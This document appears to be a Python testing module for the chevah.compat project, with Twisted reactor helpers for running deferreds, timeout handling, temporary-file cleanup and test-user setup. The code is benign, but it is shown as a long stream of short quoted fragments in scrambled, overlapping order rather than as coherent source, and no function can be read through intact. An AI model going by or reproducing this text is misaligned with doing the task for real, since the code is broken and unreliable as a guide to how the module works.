debug=False): \"\"\" Iterate the", "exists or has no job. \"\"\" if not reactor.threadpool: return", "of C{deferred} or raise C{self.failException}. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which", "called. \"\"\" if not reactor.threadpool: return [] result = []", "segments, recursive=True) return (path, segments) class FileSystemTestCase(ChevahTestCase): \"\"\" Common test", "expectedString, deferred, result[0].type, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def", "# We skip our own timeout call. if delayed is", "if ( reactor.threadpool.working or (reactor.threadpool.q.qsize() > 0) ): time.sleep(0.01) have_callbacks", "deferred.result while isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout, debug=debug) result = deferred.result", "Overwrite unit-test behaviour to run cleanup method before tearDown. \"\"\"", "OSX it returns `osx` followed by the version. It is", "has no job. \"\"\" if not reactor.threadpool: return [] else:", "is None: raise AssertionError('Failed to find \"success\" attribute.') return success", "test will fail. @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no", "if debug: # noqa:cover # When debug is enabled with", "L{Deferred<twisted.internet.defer.Deferred>} has no result, has a success result, or has", "= mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments,", "name=None, prefix='', suffix=''): \"\"\" Create a new temp folder and", "with a very small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False): \"\"\"", "inspect import threading import os import platform import socket import", "call. if delayed is self._reactor_timeout_call: continue if not delayed.func: #", "# Don't start the reactor if it is already started.", "assertion succeeds, then the result of C{deferred} is left unchanged.", "\"\"\" Create a file in the default temp folder and", "a Failure. The failed deferred is handled by this method,", "if base == 'x86_64': return 'x64' return base _CI_NAMES =", "import TestCase try: # Import reactor last in case some", "is not one of the types provided, then this test", "success_state = level[0].f_locals['success'] break except KeyError: success_state = None if", "def skipTest(message=''): '''Return a SkipTest exception.''' return SkipTest(message) @property def", "elements from the Twisted thread queue, which will never be", "protocol protocol.lineReceived('FEAT') self.executeReactor() result = transport.value() self.assertStartsWith('211-Features:\\n', result) \"\"\" if", "_runDeferred( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" This is low", "first, second, msg): super(ChevahTestCase, self).assertSetEqual(first, second, msg) first_elements = sorted(first)", "folder_segments, only_marked=False): \"\"\" Clean all test files from folder_segments. Return", "suffix='', cleanup=True): \"\"\" Return (path, segments) for a new file", "'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] # We assume that hostname does", "List of partial thread names to ignore during the tearDown.", "the current system. \"\"\" return _get_hostname() @classmethod def initialize(cls, drop_user):", "not stop the reactor. \"\"\" if timeout is None: timeout", "CPU type as used in the brink.sh script. \"\"\" base", "a \"root\" deferred. In most tests you would like to", "try: self.enterCleanup() yield finally: self.exitCleanup() def _checkTemporaryFiles(self): \"\"\" Check that", "== -1: continue temp_members.append(member) segments = folder_segments[:] segments.append(member) if temp_filesystem.isFolder(segments):", "below 2.7 we use the separate unittest2 module. # It", "raise AssertionError('Failed to find \"success\" attribute.') return success_state @staticmethod def", "have_callbacks = True while have_callbacks and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks", "for file system testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user", "stopped.') # Look at threads queue. if len(reactor.threadCallQueue) > 0:", "segments) for a new file created in temp which is", "None test case. \"\"\" success = None for i in", "or empty list when threadpool does not exists. \"\"\" if", "Failure except ImportError: # Twisted support is optional. _SocketWaker =", "This is only called when we run with -v or", "import mk from chevah.compat.testing.constant import ( TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem", "reactor.threadpool: return [] result = [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return", "= u'%s not in %s.' % (repr(source), repr(target)) raise AssertionError(message.encode('utf-8'))", "which is auto cleaned. \"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix,", "from twisted.internet import reactor except ImportError: reactor = None def", "that the reactor has no delayed calls, readers or writers.", "to wait for a deferred to have a result. DEFERRED_TIMEOUT", "# code which is executed from another thread. # removeAll", "for them when running the reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS", "= platform.mac_ver()[0].split('.') return 'osx-%s.%s' % (parts[0], parts[1]) if os_name ==", "are still active threads, ' 'beside the main thread: %s", "(path, segments) def tempFolder(self, name=None, prefix='', suffix=''): \"\"\" Create a", "you would like to use `getDeferredFailure` or `getDeferredResult`. Run the", "success def tearDown(self): try: if self._caller_success_member: # Check for a", "executed from another thread. # removeAll might fail since it", "look for other things as we already know that we", "return base _CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci',", "least for delayed calls. if have_callbacks: continue if run_once: if", "when we can not find the home folder path. if", "reactor.running and t2 reactor.doIteration(t) else: # FIXME:4428: # When not", "\"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return", "return 'x64' return base _CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis',", "that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called, or that", "else: from unittest import TestCase try: # Import reactor last", "longer be there. pass if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if", "arguments. if not inspect.isclass(expected_type): expected_type, value = value, expected_type if", "t = reactor.running and t2 reactor.doIteration(t) else: # FIXME:4428: #", "= cls.setUpTestUser() home_folder_path = system_users.getHomeFolder( username=cls.os_user.name, token=cls.os_user.token) cls.avatar = mk.makeFilesystemOSAvatar(", "have_callbacks: continue # Look at threads queue and active thread.", "a clean reactor. reactor._startedBefore = False reactor._started = False reactor._justStopped", "def _reactorQueueToString(self): \"\"\" Return a string representation of all delayed", "= mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return user def setUp(self): super(FileSystemTestCase, self).setUp() #", "\"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target,", "drop_user if 'LOGNAME' in os.environ and 'USER' not in os.environ:", "( DefaultAvatar, LocalFilesystem, process_capabilities, system_users, SuperAvatar, ) from chevah.compat.administration import", "@classmethod def _cleanFolder(cls, folder_segments, only_marked=False): \"\"\" Clean all test files", "should be started as root and we drop effective user", "# In Python 2.7 isInstance is already defined, but with", "on which the tests are currently executed. \"\"\" if os.environ.get('BUILDBOT',", "loop. have_callbacks = True while have_callbacks and not self._timeout_reached: self._iterateTestReactor(debug=debug)", "os.environ['USER'] if 'USERNAME' in os.environ and 'USER' not in os.environ:", "False reactor._started = False reactor._justStopped = False reactor.startRunning() def _iterateTestReactor(self,", "# we use super filesystem for cleaning. if cls._environ_user ==", "users.''' if cls._drop_user == '-': return os.environ['USERNAME'] = cls._drop_user os.environ['USER']", "for excepted_reader in self.EXCEPTED_READERS: if isinstance(reader, excepted_reader): have_callbacks = False", "level in inspect.stack()[1:]: try: success_state = level[0].f_locals['success'] break except KeyError:", "auto cleaned. \"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments)", "def _getDelayedCallName(self, delayed_call): \"\"\" Return a string representation of the", "deferred = checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred(", "threads tests the reactor touched from the test # case", "with swapped # arguments. if not inspect.isclass(expected_type): expected_type, value =", "# Number of second to wait for a deferred to", "t.__name__)) for t in expectedExceptionTypes]) self.fail( \"Failure of type (%s)", "patch.object(*args, **kwargs) def now(self): \"\"\" Return current Unix timestamp. \"\"\"", "when threadpool does not exists. \"\"\" if not reactor.threadpool: return", "msg): super(ChevahTestCase, self).assertDictEqual(first, second, msg) first_keys = sorted(first.keys()) second_keys =", "minor NT version. It is not the marketing name. We", "mk.fs.deleteFile(self.test_segments) checks = [ self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors = []", "self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsFailure(deferred) failure = deferred.result", "with stop procedure. return # Let the reactor know that", "if timeout is None: timeout = self.DEFERRED_TIMEOUT try: self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred,", "'-' def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ = [] self._cleanup_stack =", "kwargs in reversed(self.__cleanup__): try: function(*args, **kwargs) except Exception as error:", "len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return result def _threadPoolThreads(self): \"\"\" Return current threads", "called and the first failure is raised. \"\"\" for function,", "os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod def setUpTestUser(cls): \"\"\" Set-up OS", "current failure result of C{deferred} or raise C{self.failException}. @param deferred:", "or we show the error. \"\"\" class_name = text_type(self.__class__)[8:-2] class_name", "timeout=None, debug=False, run_once=False): \"\"\" Run reactor until no more delayed", "for other delayed calls. have_callbacks = True break # No", "result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def assertNoResult(self, deferred): \"\"\"", "to have a result. DEFERRED_TIMEOUT = 1 # List of", "\"\"\" Check that deferred is a failure. \"\"\" if not", "another thread. # removeAll might fail since it detects that", "(temp_filesystem.getFolderContent(folder_segments)): if only_marked and member.find(TEST_NAME_MARKER) == -1: continue temp_members.append(member) segments", "Create a folder in the default temp folder and mark", "We assume that hostname does not change during test and", "# Start running has consumed the startup events, so we", "finally: self._shutdownTestReactor( prevent_stop=prevent_stop) def _executeDeferred(self, deferred, timeout, debug): \"\"\" Does", "no temporary files or folders are present. \"\"\" # FIXME:922:", "the reactor. This is only for cleanup purpose and should", "def getDeferredFailure( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run the", "or raise C{self.failException}. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a", "( not isinstance(first, text_type) and isinstance(second, text_type) ): # noqa:cover", "True return False def addCleanup(self, function, *args, **kwargs): \"\"\" Overwrite", "might be no longer be there. pass if not delayed_calls:", "the os_name. On Linux is the distribution name and the", "iterateReactorWithStop(self, count=1, timeout=None, debug=False): \"\"\" Iterate the reactor and stop", "errors: raise AssertionError('Cleanup errors: %r' % (errors,)) def _isExceptedThread(self, name):", "noqa:cover return 'aix-%s.%s' % (platform.version(), platform.release()) if os_name != 'linux':", "> 0: have_callbacks = True continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None,", "\".join([ '.'.join((t.__module__, t.__name__)) for t in expectedExceptionTypes]) self.fail( \"Failure of", "\"\"\" Test case for Chevah tests. Checks that temporary folder", "AssertionError('OS not supported.') def folderInTemp(self, *args, **kwargs): \"\"\" Create a", "exception_class, callback=None, *args, **kwargs): \"\"\" Wrapper around the stdlib call", "continue with stop procedure. return # Let the reactor know", "range import contextlib import inspect import threading import os import", "the 'success' member from the None test case. \"\"\" success", "for reader in reactor.getReaders(): have_callbacks = True for excepted_reader in", "continue # Look at threads queue and active thread. if", "OS account present. \"\"\" #: User will be created before", "#: teardown. CREATE_TEST_USER = None @classmethod def setUpTestUser(cls): \"\"\" Add", "that C{deferred} does not have a result at this point.", "in case some other modules are changing the reactor. from", "reader in reactor.getReaders(): excepted = False for reader_type in self.EXCEPTED_READERS:", "this point. If the assertion succeeds, then the result of", "return mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self, *args, **kwargs): \"\"\" Create a", "if pool_queue: raise_failure('threadpoool queue', pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking())", "except KeyError: success_state = None if success_state is None: raise", "in os.environ and 'USERNAME' not in os.environ: os.environ['USERNAME'] = os.environ['USER']", "(deferred, result[0])) elif (expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)): expectedString = \"", "@type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no", "Clean all test files from temporary folder. Return a list", "# Twisted support is optional. _SocketWaker = None _UnixWaker =", "know that we need # to wait at least for", "the reactor until callable returns `True`. \"\"\" if timeout is", "\"\"\" for function, args, kwargs in reversed(self.__cleanup__): try: function(*args, **kwargs)", "for check in checks: try: check() except AssertionError as error:", "**kwargs) def fileInTemp(self, *args, **kwargs): \"\"\" Create a file in", "\"\"\" Return current tasks of thread Pool, or [] when", "or that the L{Deferred<twisted.internet.defer.Deferred>} is waiting on another L{Deferred<twisted.internet.defer.Deferred>} for", "in reactor.getReaders(): have_callbacks = True for excepted_reader in self.EXCEPTED_READERS: if", "Copyright (c) 2011 <NAME>. # See LICENSE for details. \"\"\"", "OS account. \"\"\" @classmethod def setUpClass(cls): # FIXME:924: # Disabled", "reactor.iterate() # Set flag to fake a clean reactor. reactor._startedBefore", "wrapped by the failure result is not one of the", "real OS account. \"\"\" @classmethod def setUpClass(cls): # FIXME:924: #", "if not self._timeout_reached: # Everything fine, disable timeout. if (", "( isinstance(first, text_type) and not isinstance(second, text_type) ): # noqa:cover", "assertDictEqual(self, first, second, msg): super(ChevahTestCase, self).assertDictEqual(first, second, msg) first_keys =", "debug=debug, prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return deferred.result def assertWasCalled(self, deferred): \"\"\"", "DNS queries. hostname = _get_hostname() Bunch = Bunch Mock =", "from __future__ import division from __future__ import absolute_import from six", "_SIGCHLDWaker ) from twisted.python.failure import Failure except ImportError: # Twisted", "== 'nt': from wmi import WMI local_wmi = WMI('.') query", "is not created yet but which will be automatically removed.", "_threadPoolWorking(self): \"\"\" Return working thread from pool, or empty when", "_: None) self.fail( \"No result expected on %r, found %r", "= 'rhel' distro_version = ld.version().split('.', 1)[0] return '%s-%s' % (distro_name,", "# -*- coding: utf-8 -*- # Copyright (c) 2011 <NAME>.", "force to reactor to wake at an # interval of", "\"Success result expected on %r, found no result instead\" %", "def assertSetEqual(self, first, second, msg): super(ChevahTestCase, self).assertSetEqual(first, second, msg) first_elements", "while executing the reactor. \"\"\" self._timeout_reached = True failure =", "call to allow non-context usage. \"\"\" super_assertRaises = super(ChevahTestCase, self).assertRaises", "events, so we need # to restore them. reactor.addSystemEventTrigger( 'during',", "list when threadpool does not exists. \"\"\" if not reactor.threadpool:", "not in %s.' % (repr(source), repr(target)) raise AssertionError(message.encode('utf-8')) def assertIsInstance(self,", "found no result instead\" % ( deferred,)) elif isinstance(result[0], Failure):", ") def _get_ci_name(): \"\"\" Return the name of the CI", "', '') return raw_name.split(' ', 1)[0] def getDeferredFailure( self, deferred,", "import SkipTest try: from twisted.internet.defer import Deferred from twisted.internet.posixbase import", "the deferred and return the result. Usage:: checker = mk.credentialsChecker()", "would like to use `getDeferredFailure` or `getDeferredResult`. Run the deferred", "foldername=name, prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return", "is None: return super_assertRaises(exception_class) with super_assertRaises(exception_class) as context: callback(*args, **kwargs)", "value in bytes, instead of Kilobytes. return int(peak_working_set_size) else: raise", "iterateReactor(self, count=1, timeout=None, debug=False): \"\"\" Iterate the reactor without stopping", "\"\"\" if not reactor.threadpool: return [] else: return reactor.threadpool.working @classmethod", "stopped. \"\"\" if not self._timeout_reached: # Everything fine, disable timeout.", "deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsFailure(deferred) failure = deferred.result self.ignoreFailure(deferred)", "\"\"\" # In Python 2.7 isInstance is already defined, but", "home_folder_path = system_users.getHomeFolder( username=cls.os_user.name, token=cls.os_user.token) cls.avatar = mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path,", "len(reactor.threadpool.working) > 0: raise_failure('active threads', reactor.threadCallQueue) pool_queue = self._threadPoolQueue() if", "**kwargs): \"\"\" Create a file in the default temp folder", "@type deferred: L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes: Exception types to expect -", "if errors: raise AssertionError('Cleanup errors: %r' % (errors,)) def _isExceptedThread(self,", "( expectedString, deferred, result[0].type, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0]", "raised an exception or returned a L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>}", "[] deferred.addBoth(result.append) if not result: self.fail( \"Success result expected on", "full thread name excepted_threads = [ 'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler',", "return time.time() @classmethod def cleanTemporaryFolder(cls): \"\"\" Clean all test files", "mock import patch, Mock from nose import SkipTest try: from", "% ( deferred,)) elif not isinstance(result[0], Failure): self.fail( \"Failure result", "= [ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ] # Scheduled event to", "in zip(first, second): self.assertEqual(first_element, second_element) def assertDictEqual(self, first, second, msg):", "find \"success\" attribute.') return success_state @staticmethod def patch(*args, **kwargs): \"\"\"", "noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader in reactor.getReaders(): excepted = False", "which has a success result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>}", "has no result or has a failure result. @return: The", "first failure is raised. \"\"\" for function, args, kwargs in", "self.fail( \"Failure of type (%s) expected on %r, \" \"found", "for level in inspect.stack()[1:]: try: success_state = level[0].f_locals['success'] break except", "the reactor know that we want to stop reactor. reactor.stop()", "which has a failure result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>}", "threads: thread_name = thread.getName() if self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError( 'There are", "SuperAvatar, ) from chevah.compat.administration import os_administration from chevah.compat.testing.assertion import AssertionMixin", "_get_os_version(): \"\"\" On non-Linux this is just the os_name. On", "from the test # case itself which run in one", "<gh_stars>1-10 # -*- coding: utf-8 -*- # Copyright (c) 2011", "AlreadyCalled are ValueError. # Might be canceled from the separate", "reactor._started: return reactor._startedBefore = False reactor._started = False reactor._justStopped =", "instead: %s\" % ( expectedString, deferred, result[0].type, result[0].getBriefTraceback().decode( 'utf-8', errors='replace')))", "after upgrading to Twisted 13 result = [] def cb(res):", "LocalFilesystem, process_capabilities, system_users, SuperAvatar, ) from chevah.compat.administration import os_administration from", "(path, segments) for a new file created in temp which", "parts[1]) # We are now in Unix zone. os_name =", "return patch(*args, **kwargs) @staticmethod def patchObject(*args, **kwargs): \"\"\" Helper for", "if 'USERNAME' in os.environ and 'USER' not in os.environ: os.environ['USER']", "= None # We stop the reactor on failures. self._shutdownTestReactor()", "result = [] deferred.addBoth(result.append) if not result: self.fail( \"Failure result", "bytes. \"\"\" if cls.os_family == 'posix': import resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss", "if not result: self.fail( \"Success result expected on %r, found", "passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self): \"\"\"", "timeout = self.DEFERRED_TIMEOUT try: self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred, timeout, debug=debug) finally: self._shutdownTestReactor(", "not is_exception: # No need to look for other delayed", "calls are scheduled. This will wait for delayed calls to", "patch(*args, **kwargs): \"\"\" Helper for generic patching. \"\"\" return patch(*args,", "reason)) if reactor._started: # noqa:cover # Reactor was not stopped,", "contextlib import inspect import threading import os import platform import", "project. \"\"\" from __future__ import print_function from __future__ import division", "failure will not be raised at reactor shutdown for not", "When debug is enabled with iterate using a small delay", "reached the end of its callback chain and the last", "then this test will fail. @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>}", "AssertionError('Reactor was not stopped.') # Look at threads queue. if", "wait for delayed calls to be executed and will not", "patch, Mock from nose import SkipTest try: from twisted.internet.defer import", "A L{Deferred<twisted.internet.defer.Deferred>} which has a failure result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>}", "an exception or returned a L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @param", "during the tearDown. # No need for the full thread", "\"\"\" Signal an timeout error while executing the reactor. \"\"\"", "stop in a previous run. if reactor._started: return reactor._startedBefore =", "failure result is not one of the types provided, then", "Test case for tests that need a dedicated local OS", "# Otherwise the debug messages will flood the output. print", "ValueError: # noqa:cover # Timeout might be no longer be", "reactor.threadpool.working @classmethod def _cleanReactor(cls): \"\"\" Remove all delayed calls, readers", "This will wait for delayed calls to be executed and", "failure def successResultOf(self, deferred): \"\"\" Return the current success result", "= [ 'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] #", "return True if exception in name: return True return False", "checks = [ self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors = [] for", "addCleanup(self, function, *args, **kwargs): \"\"\" Overwrite unit-test behaviour to run", "reactor on failures. self._shutdownTestReactor() raise AssertionError( 'executeDelayedCalls took more than", "as super user, # we use super filesystem for cleaning.", "class FileSystemTestCase(ChevahTestCase): \"\"\" Common test case for all file-system tests", "reactor. \"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout)", "self._reactor_timeout_call: continue if not delayed.func: # Was already called. continue", "If there is already a failure, the self.fail below will", "self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1, timeout=None, debug=False): \"\"\" Iterate the reactor", "or folders are present. \"\"\" # FIXME:922: # Move all", "already a failure, the self.fail below will # report it,", "self._initiateTestReactor(timeout=timeout) # Set it to True to enter the first", "unexpected failure result. @return: The failure result of C{deferred}. @rtype:", "this # should save a few DNS queries. hostname =", "reactor know that we want to stop reactor. reactor.stop() #", "nose import SkipTest try: from twisted.internet.defer import Deferred from twisted.internet.posixbase", "the steps required to initiate a reactor for testing. \"\"\"", "local_wmi = WMI('.') query = ( u'SELECT PeakWorkingSetSize ' u'FROM", "Unix timestamp. \"\"\" return time.time() @classmethod def cleanTemporaryFolder(cls): \"\"\" Clean", "at the end of a test reactor run. When prevent_stop=True,", "FIXME:4428: # When not executed in debug mode, some test", "See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name == 'nt': parts = platform.version().split('.')", "Starts the reactor, waits for deferred execution, raises error in", "executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run the reactor until no more", "`True` if is OK for thread to exist after test", "not self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls = reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except ValueError:", "(RuntimeError, KeyError): # FIXME:863: # When running threads tests the", "it is already started. # This can happen if we", "L{Deferred<twisted.internet.defer.Deferred>} which has a success result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or", "self.__cleanup__ = [] self._cleanup_stack = [] self._teardown_errors = [] self.test_segments", "len(reactor.getWriters()) > 0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader in", "= [] self._cleanup_stack = [] self._teardown_errors = [] self.test_segments =", "purpose and should not be used by normal tests. \"\"\"", "other source. pass reactor.threadCallQueue = [] for delayed_call in reactor.getDelayedCalls():", "result of C{deferred}. @rtype: L{failure.Failure} \"\"\" # FIXME:1370: # Remove", "# We are now in Unix zone. os_name = os.uname()[0].lower()", "def assertSequenceEqual(self, first, second, msg, seq_type): super(ChevahTestCase, self).assertSequenceEqual( first, second,", "= checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred( deferred,", "description for the test. bla.bla.tests. is removed. The format is", "credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError,", "return '%s-%s' % (distro_name, distro_version) def _get_cpu_type(): \"\"\" Return the", "delayed_call in reactor.getDelayedCalls(): try: delayed_call.cancel() except (ValueError, AttributeError): # AlreadyCancelled", "tests you would like to use `getDeferredFailure` or `getDeferredResult`. Run", "import text_type from six.moves import range import contextlib import inspect", "failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return the current failure result of", "of names for delayed calls which should not be considered", "deferred.addBoth(result.append) if not result: self.fail( \"Failure result expected on %r,", "the stop code. reactor.iterate() # Set flag to fake a", "timeout, self._raiseReactorTimeoutError, timeout) # Don't start the reactor if it", "an unexpected failure result. @return: The failure result of C{deferred}.", "all RHEL variants. distro_name = 'rhel' distro_version = ld.version().split('.', 1)[0]", "reactor. from twisted.internet import reactor except ImportError: reactor = None", "# current stack and we don't care about it. for", "if success is None: raise AssertionError('Failed to find \"success\" attribute.')", "for Chevah Nose runner. This is only called when we", "str while second is unicode for \"%s\".' % ( first,)", "delayed calls, readers or writers. This should only be called", "tempPath(self, prefix='', suffix=''): \"\"\" Return (path, segments) for a path", "Python below 2.7 we use the separate unittest2 module. #", "Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it returns `osx`", "reactor. \"\"\" reactor.runUntilCurrent() if debug: # noqa:cover # When debug", "not reactor: return try: reactor.removeAll() except (RuntimeError, KeyError): # FIXME:863:", "for member in (temp_filesystem.getFolderContent(folder_segments)): if only_marked and member.find(TEST_NAME_MARKER) == -1:", "the default temp folder and mark it for cleanup. \"\"\"", "teardown. CREATE_TEST_USER = None @classmethod def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER`", "prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return deferred.result def assertWasCalled(self, deferred): \"\"\" Check", "callable returns `True`. \"\"\" if timeout is None: timeout =", "case some other modules are changing the reactor. from twisted.internet", "reactor.stop() # Let the reactor run one more time to", "failure result. @return: The result of C{deferred}. \"\"\" # FIXME:1370:", "Normalize all RHEL variants. distro_name = 'rhel' distro_version = ld.version().split('.',", "Please use self.patch and self.patchObject. Patch = patch _environ_user =", "now(self): \"\"\" Return current Unix timestamp. \"\"\" return time.time() @classmethod", "other delayed calls. have_callbacks = True break # No need", "'LOGNAME' in os.environ and 'USER' not in os.environ: os.environ['USER'] =", "using a real OS account. \"\"\" @classmethod def setUpClass(cls): #", "process_capabilities.os_name # We delay the import as it will call", "have_callbacks = False # Check for active jobs in thread", "patching objects. \"\"\" return patch.object(*args, **kwargs) def now(self): \"\"\" Return", "setUpClass(cls): # FIXME:924: # Disabled when we can not find", "GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\" Return", "assertIsInstance(self, expected_type, value, msg=None): \"\"\" Raise an exception if `value`", "continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run the reactor", "and start/stop the reactor during tests. \"\"\" # Number of", "system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return a SkipTest exception.''' return SkipTest(message)", "is_exception = False for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in", "def iterateReactor(self, count=1, timeout=None, debug=False): \"\"\" Iterate the reactor without", "'utf-8', errors='replace'))) else: return result[0] def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\"", "reactor at shutdown, only if test # passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean()", "'x86_64': return 'x64' return base _CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions',", "deferred execution, raises error in timeout, stops the reactor. This", "if it is already started. # This can happen if", "debug=False): \"\"\" Run the reactor until no more delayed calls", "dropPrivileges(cls): '''Drop privileges to normal users.''' if cls._drop_user == '-':", "(parts[1],) if os_name == 'aix': # noqa:cover return 'aix-%s.%s' %", "None: self._reactor_timeout_failure = None # We stop the reactor on", "return (path, segments) def tempFolder(self, name=None, prefix='', suffix=''): \"\"\" Create", "( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def failureResultOf(self,", "if not msg: msg = u'First is str while second", "Test suite should be started as root and we drop", "suffix=suffix) def tempPathCleanup(self, prefix='', suffix=''): \"\"\" Return (path, segments) for", "debug=False): \"\"\" Iterate the reactor and stop it at the", "if isinstance(reader, reader_type): excepted = True break if not excepted:", "os_administration.addUser(user) return user def setUp(self): super(FileSystemTestCase, self).setUp() # Initialized only", "second_keys = sorted(second.keys()) first_values = [first[key] for key in first_keys]", "in name: return True return False def addCleanup(self, function, *args,", "the reactor for `duration` seconds.. \"\"\" start = time.time() self.executeReactorUntil(", "\"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = [] def exitCleanup(self): \"\"\" To be", "0: have_callbacks = True continue if reactor.threadpool and len(reactor.threadpool.working) >", "**kwargs): \"\"\" Wrapper around the stdlib call to allow non-context", "We skip our own timeout call. if delayed is self._reactor_timeout_call:", "= inspect.stack()[i][0].f_locals['success'] break except KeyError: success = None if success", "transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor() result = transport.value() self.assertStartsWith('211-Features:\\n', result)", "if not reactor: return try: reactor.removeAll() except (RuntimeError, KeyError): #", "@classmethod def initialize(cls, drop_user): \"\"\" Initialize the testing environment. \"\"\"", "self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls = reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except ValueError: #", "reactor.threadpool.threads def _threadPoolWorking(self): \"\"\" Return working thread from pool, or", "stop code. reactor.iterate() # Set flag to fake a clean", "end of a test reactor run. When prevent_stop=True, the reactor", "to exist after test is done. \"\"\" for exception in", "raise AssertionError('OS not 